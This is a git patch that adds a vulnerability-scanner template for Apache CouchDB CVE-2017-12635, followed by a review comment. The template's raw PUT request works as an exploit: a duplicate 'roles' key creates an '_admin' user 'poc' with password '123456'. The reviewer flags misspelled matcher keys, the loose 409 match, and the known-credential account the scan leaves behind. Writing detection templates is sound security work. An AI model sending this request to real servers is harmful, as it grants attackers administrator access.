From 123b9e32eaa3764d35e6c2fad184a46f0668abf0 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Mon, 15 Feb 2021 13:31:56 +0000
Subject: [PATCH] Add Apache CouchDB(CVE-2017-12635)
---
 cves/2017/CVE-2017-12635.yaml | 48 +++++++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 cves/2017/CVE-2017-12635.yaml
diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml
new file mode 100644
index 0000000000..0c005b9418
--- /dev/null
+++ b/cves/2017/CVE-2017-12635.yaml
@@ -0,0 +1,48 @@
+id: CVE-2017-12635
+
+info:
+ name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 RPE
+ author: pikpikcu
+ severity: high
+ reference: https://github.com/assalielmehdi/CVE-2017-12635
+ tags: couchdb,rpe
+
+requests:
+ - raw:
+ - |
+ PUT /_users/org.couchdb.user:poc HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: application/json
+ DNT: 1
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Content-Length: 108
+
+ {
+ "type": "user",
+ "name": "poc",
+ "roles": ["_admin"],
+ "roles": [],
+ "password": "123456"
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "application/json"
+ - "Location:"
+ part: header
+ condtion: and
+ - type: word
+ words:
+ - "org.couchdb.user:poc"
+ - "conflict"
+ - "Document update conflict"
+ part: body
+ condtion: and
+ - type: status
+ status:
+ - 201
+ - 409
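Review bot: The key `condtion: and` on both word matchers (header and body) is misspelled, so it is most likely ignored and each word list falls back to the default `or`, which makes the header matcher pass on any JSON response. Spell it `condition:` and choose the value deliberately: a literal `and` on the body matcher would need the created document id and both conflict strings in one response, which looks unlikely, so `condition: or` there and `condition: and` on the header matcher seems to be the intent. Accepting status `409` also looks too loose, since a conflict presumably only shows that `org.couchdb.user:poc` already exists, not that the duplicate `roles` key was honoured, so patched hosts may be reported. Separately, the fixed name `poc` and password `123456` leave a known-credential account on every host that does accept the request; `{{randstr}}` values plus a cleanup note in `info` would limit what a scan leaves behind.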